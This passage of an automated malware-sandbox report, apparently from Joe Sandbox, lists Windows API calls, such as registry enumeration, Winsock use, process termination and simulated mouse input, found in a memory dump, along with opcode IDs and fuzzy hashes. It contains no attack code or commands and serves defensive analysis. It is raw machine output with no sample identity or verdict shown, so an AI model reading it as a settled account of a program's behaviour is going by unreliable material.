                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B398D
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B39A7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006880D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006880F6
• SysAllocString.OLEAUT32(00000000), ref: 006880F9
• SysAllocString.OLEAUT32(?), ref: 00688117
• SysFreeString.OLEAUT32(?), ref: 00688120
• StringFromGUID2.OLE32(?,?,00000028), ref: 00688145
• SysAllocString.OLEAUT32(?), ref: 00688153
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006881A9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006881CF
• SysAllocString.OLEAUT32(00000000), ref: 006881D2
• SysAllocString.OLEAUT32 ref: 006881F3
• SysFreeString.OLEAUT32 ref: 006881FC
• StringFromGUID2.OLE32(?,?,00000028), ref: 00688216
• SysAllocString.OLEAUT32(?), ref: 00688224
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00690E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00690ED5
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00690F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00690FA8
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 00627873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
  • Part of subcall function 00627873: GetStockObject.GDI32(00000011), ref: 006278C5
  • Part of subcall function 00627873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006B4BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006B4BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006B4BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006B4BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006B4BE3
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
Similarity
• API ID: _memcmp
• String ID: j`h
• API String ID: 2931989736-2627015977
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0068E328
• LoadStringW.USER32(00000000), ref: 0068E32F
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0068E345
• LoadStringW.USER32(00000000), ref: 0068E34C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0068E390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0068E36D
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00691322
• EnterCriticalSection.KERNEL32(00000000,?), ref: 00691334
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00691342
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00691350
• CloseHandle.KERNEL32(00000000), ref: 0069135F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0069136F
• LeaveCriticalSection.KERNEL32(00000000), ref: 00691376
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006A281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006A283E
• WSAGetLastError.WSOCK32 ref: 006A284F
• htons.WSOCK32(?,?,?,?,?), ref: 006A2938
• inet_ntoa.WSOCK32(?), ref: 006A28E9
  • Part of subcall function 0068433E: _strlen.LIBCMT ref: 00684348
  • Part of subcall function 006A3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0069F669), ref: 006A3C9D
• _strlen.LIBCMT ref: 006A2992
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
APIs
• __allrem.LIBCMT ref: 0065042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00650446
• __allrem.LIBCMT ref: 0065045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0065047B
• __allrem.LIBCMT ref: 00650492
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006504B0
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00648649,00648649,?,?,?,006567C2,00000001,00000001,8BE85006), ref: 006565CB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006567C2,00000001,00000001,8BE85006,?,?,?), ref: 00656651
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0065674B
• __freea.LIBCMT ref: 00656758
  • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
• __freea.LIBCMT ref: 00656761
• __freea.LIBCMT ref: 00656786
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1414292761-0
                                                                  • Opcode ID: 56575b067c0591862098f27cc6b2b6e9d868496f3ad85475faf9834f88ca61a4
                                                                  • Instruction ID: baf5ce16f8dba165163fe70d1f49b0c124350baa48d9bcd09dea54b6720c9598
                                                                  • Opcode Fuzzy Hash: 56575b067c0591862098f27cc6b2b6e9d868496f3ad85475faf9834f88ca61a4
                                                                  • Instruction Fuzzy Hash: 6451F2B2600216AFEB258F64CC81EFB77ABEB58755F544668FC04DB240EB35DC58C6A0
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC72A
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC785
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC7CA
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006AC7F9
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006AC853
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC85F
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 1120388591-0
                                                                  • Opcode ID: dfa9480272f83f74acd8d0208e662ae8a762c3f4d3461ffa8679c9465ed35b2e
                                                                  • Instruction ID: 112c077d91cb73b17ea24eec1557b4dbe2e34a665f0f2d8253700eedf5430e43
                                                                  • Opcode Fuzzy Hash: dfa9480272f83f74acd8d0208e662ae8a762c3f4d3461ffa8679c9465ed35b2e
                                                                  • Instruction Fuzzy Hash: 6F81BF71208641AFD714EF24C884E6ABBE6FF85318F14899CF0594B2A2DB31ED46CF91
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000035), ref: 006800A9
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00680150
                                                                  • VariantCopy.OLEAUT32(00680354,00000000), ref: 00680179
                                                                  • VariantClear.OLEAUT32(00680354), ref: 0068019D
                                                                  • VariantCopy.OLEAUT32(00680354,00000000), ref: 006801A1
                                                                  • VariantClear.OLEAUT32(?), ref: 006801AB
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                  • String ID:
                                                                  • API String ID: 3859894641-0
                                                                  • Opcode ID: e488e9d6f5160691b145b5ee0b6c09ea02d77a86a338c32e63846ac00e78ba0b
                                                                  • Instruction ID: 51744d42adff071f8f5b3e7fa69691686b4fbc3c6cdc1ecf83f2b7a4f17a673c
                                                                  • Opcode Fuzzy Hash: e488e9d6f5160691b145b5ee0b6c09ea02d77a86a338c32e63846ac00e78ba0b
                                                                  • Instruction Fuzzy Hash: 1A512F31500310E6EFD0BF649899B69B3EBEF05310F10994BE905DF296DBB09D49CB59
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00699F2A
                                                                  • _wcslen.LIBCMT ref: 00699F4B
                                                                  • _wcslen.LIBCMT ref: 00699F72
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00699FCA
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                  • String ID: X
                                                                  • API String ID: 83654149-3081909835
                                                                  • Opcode ID: e32ccd903280f17a8ce674bfd22f2d64c5beab1c68be514eb813b060b1f92ade
                                                                  • Instruction ID: 88a5dc3f9e7b1c3f08096692c4289a6bd1931ef7e1070f21e61e76b84db87b26
                                                                  • Opcode Fuzzy Hash: e32ccd903280f17a8ce674bfd22f2d64c5beab1c68be514eb813b060b1f92ade
                                                                  • Instruction Fuzzy Hash: D6E192315047109FDB64DF28D881AAAB7E6BF84314F04896DF8898B3A2DB31DD45CF96
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00696F21
                                                                  • CoInitialize.OLE32(00000000), ref: 0069707E
                                                                  • CoCreateInstance.OLE32(006C0CC4,00000000,00000001,006C0B34,?), ref: 00697095
                                                                  • CoUninitialize.OLE32 ref: 00697319
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: b30908067ff1761b392a33ded8bd752b79f7dcb94090465fc8a91e7978144918
                                                                  • Instruction ID: 1ae9ed19526f1e3b88a3671512ea3fdcb176e755d03166dddccb7e4dafd038c4
                                                                  • Opcode Fuzzy Hash: b30908067ff1761b392a33ded8bd752b79f7dcb94090465fc8a91e7978144918
                                                                  • Instruction Fuzzy Hash: 1AD15771508611AFC340EF24D881AABB7EAEF98704F40496DF5858B262DB71ED45CB92
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 006911B3
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006911EE
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0069120A
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00691283
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0069129A
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 006912C8
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3368777196-0
                                                                  • Opcode ID: 6af39cf63ce1a4c1021682ab26f96cfcce10f04c5a87973c9d9aba97813f5a3c
                                                                  • Instruction ID: afc0d603d5ec0de6c02bd5d89856ccee928bc89321369517a2286166835afb84
                                                                  • Opcode Fuzzy Hash: 6af39cf63ce1a4c1021682ab26f96cfcce10f04c5a87973c9d9aba97813f5a3c
                                                                  • Instruction Fuzzy Hash: 71416B71900205EFDF04AF94DC85AAAB7BAFF05310F1440A9EE009F296DB30DE91DBA4
                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0067FBEF,00000000,?,?,00000000,?,006639E2,00000004,00000000,00000000), ref: 006B8CA7
                                                                  • EnableWindow.USER32(?,00000000), ref: 006B8CCD
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006B8D2C
                                                                  • ShowWindow.USER32(?,00000004), ref: 006B8D40
                                                                  • EnableWindow.USER32(?,00000001), ref: 006B8D66
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 006B8D8A
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: a52f7b5f6986c95c88ef65a38b66c6c3f7f9829556a9b933f77f35789fabbbc7
                                                                  • Instruction ID: 20f2babfb4492abe410b547175daa81550047ce3b1292db0338be82f5f953d34
                                                                  • Opcode Fuzzy Hash: a52f7b5f6986c95c88ef65a38b66c6c3f7f9829556a9b933f77f35789fabbbc7
                                                                  • Instruction Fuzzy Hash: DE41A1B0642245AFDB25DF24C899BE17FF7FF46305F1851A9E5084F2A2CB71A885CB60
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 006A2D45
                                                                    • Part of subcall function 0069EF33: GetWindowRect.USER32(?,?), ref: 0069EF4B
                                                                  • GetDesktopWindow.USER32 ref: 006A2D6F
                                                                  • GetWindowRect.USER32(00000000), ref: 006A2D76
                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 006A2DB2
                                                                  • GetCursorPos.USER32(?), ref: 006A2DDE
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006A2E3C
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                  • String ID:
                                                                  • API String ID: 2387181109-0
                                                                  • Opcode ID: 92651ee5f6d3afe0ffc7e218ef0fc2ac7ac5dc45e87b8959319601214f395bb7
                                                                  • Instruction ID: 8fbb130b85850edda7019de25f29b362d16bfee0c88e16e0cc88b725867d8119
                                                                  • Opcode Fuzzy Hash: 92651ee5f6d3afe0ffc7e218ef0fc2ac7ac5dc45e87b8959319601214f395bb7
                                                                  • Instruction Fuzzy Hash: A331D272545316ABC720EF18C845F9BB7AAFF85354F000619F48597182EA30ED49CBE2
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 006855F9
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00685616
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0068564E
                                                                  • _wcslen.LIBCMT ref: 0068566C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00685674
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068567E
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 72514467-0
                                                                  • Opcode ID: be18949b3d424b08715f3363567c2f5248987329cc2cfabb7d287c4ba5d1a1b6
                                                                  • Instruction ID: 55a1cbfba0eb830a6c4124c1f589887f2842117c2187c902bba8947cfb043122
                                                                  • Opcode Fuzzy Hash: be18949b3d424b08715f3363567c2f5248987329cc2cfabb7d287c4ba5d1a1b6
                                                                  • Instruction Fuzzy Hash: 032126722046007BEB166B64DC49EBB7BAADF45720F14427DF906DA1A1FE71CC818760
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                  • _wcslen.LIBCMT ref: 006962C0
                                                                  • CoInitialize.OLE32(00000000), ref: 006963DA
                                                                  • CoCreateInstance.OLE32(006C0CC4,00000000,00000001,006C0B34,?), ref: 006963F3
                                                                  • CoUninitialize.OLE32 ref: 00696411
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 3172280962-24824748
                                                                  • Opcode ID: bc6c73ebd4286a4fe283406dc614d64d5157ff2e612eeefea174154b1f635d0e
                                                                  • Instruction ID: 67d1ac034f6d846bf6afbdd5a9e39e5db88173e09ee2473b658b8e59f518d05f
                                                                  • Opcode Fuzzy Hash: bc6c73ebd4286a4fe283406dc614d64d5157ff2e612eeefea174154b1f635d0e
                                                                  • Instruction Fuzzy Hash: B0D14371A043119FCB14DF24C484A6ABBEAFF89714F15895DF8869B361CB31EC45CB92
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,006436E9,00643355), ref: 00643700
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0064370E
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00643727
                                                                  • SetLastError.KERNEL32(00000000,?,006436E9,00643355), ref: 00643779
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 0823cc91b2a27423428253879c8f05676a7dade2b22e226e40001f14ec5c760f
                                                                  • Instruction ID: 565258fad418d311a764d9cee3a982b963b0b1cea0336bfb0225c2da0dceaafb
                                                                  • Opcode Fuzzy Hash: 0823cc91b2a27423428253879c8f05676a7dade2b22e226e40001f14ec5c760f
                                                                  • Instruction Fuzzy Hash: FF014CF254E3316EA7642BB5BCC65A72A97EB05775724032DF150493F2EF114E029148
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00644D53,00000000,?,?,006468E2,?,?,00000000), ref: 006530EB
                                                                  • _free.LIBCMT ref: 0065311E
                                                                  • _free.LIBCMT ref: 00653146
                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00653153
                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 0065315F
                                                                  • _abort.LIBCMT ref: 00653165
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: 5762263e0fdd8ea515ecd288fddc9110af4225ace0862b488f5cca6d5daf11ec
                                                                  • Instruction ID: 591b003938ae7ae47e788cf653f9a315f549cd556916e5eb3a132728c22a388c
                                                                  • Opcode Fuzzy Hash: 5762263e0fdd8ea515ecd288fddc9110af4225ace0862b488f5cca6d5daf11ec
                                                                  • Instruction Fuzzy Hash: DFF0F975500A1167C3712735AC06A9A32679FD2BF3F25051CFD14D63D2FE208A4E4165
                                                                  APIs
                                                                    • Part of subcall function 00621F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00621F87
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621F96
                                                                    • Part of subcall function 00621F2D: BeginPath.GDI32(?), ref: 00621FAD
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621FD6
                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 006B94AA
                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 006B94BE
                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 006B94CC
                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 006B94DC
                                                                  • EndPath.GDI32(?), ref: 006B94EC
                                                                  • StrokePath.GDI32(?), ref: 006B94FC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  • Opcode ID: c81e4793a2fd89589ffb3dfb503fe6ed48e3cd8c2bd185f716c44cec02d1125c
                                                                  • Instruction ID: e6e176e2e556a9b26a7402c8807f48782a69c17bffa03aa701028d893d751ed8
                                                                  • Opcode Fuzzy Hash: c81e4793a2fd89589ffb3dfb503fe6ed48e3cd8c2bd185f716c44cec02d1125c
                                                                  • Instruction Fuzzy Hash: 711109B600010DBFDB129F90DC88EEA7FAEEB08364F049111BA194A161D7719D95DFA0
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 00685B7C
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00685B8D
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00685B94
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00685B9C
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00685BB3
                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00685BC5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 997d279920ac114af54fa85c7a92c20fa544989364927d48a8d05c5cd2ca5828
                                                                  • Instruction ID: c8111df17d366f51e7613e8874e4fa12b0fb1a0aa82b9499efe596d5bb3ea286
                                                                  • Opcode Fuzzy Hash: 997d279920ac114af54fa85c7a92c20fa544989364927d48a8d05c5cd2ca5828
                                                                  • Instruction Fuzzy Hash: 2D0144B5E00719BBEB10AFA59C49E8E7F79EB44751F004165FA05AB280E6709C40CF90
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006232AF
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 006232B7
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006232C2
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006232CD
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 006232D5
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 006232DD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 010dd9dd2683a7733f606b7d599155c924284bb3d6939423a6d0166a8d83b4c5
                                                                  • Instruction ID: 956e07e63f6c7ee2b78a7539c09d315527ba7ae3a837461fdb9f44699db6f05b
                                                                  • Opcode Fuzzy Hash: 010dd9dd2683a7733f606b7d599155c924284bb3d6939423a6d0166a8d83b4c5
                                                                  • Instruction Fuzzy Hash: A40167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0068F447
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0068F45D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0068F46C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F47B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F485
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F48C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: f4ddfccc45ed6de487d7014344d319d3d8554ea4378bff8a0374090c74348bd5
                                                                  • Instruction ID: 1404253b7e354c821ba36c9df5d0a9ddd2892a6d34ca1c50f4d8a00ed5714e41
                                                                  • Opcode Fuzzy Hash: f4ddfccc45ed6de487d7014344d319d3d8554ea4378bff8a0374090c74348bd5
                                                                  • Instruction Fuzzy Hash: 4FF0B4B2201158BBE72057529C0EEEF3F7DEFC6B11F000268F601D5091FBA01A81C6B5
                                                                  APIs
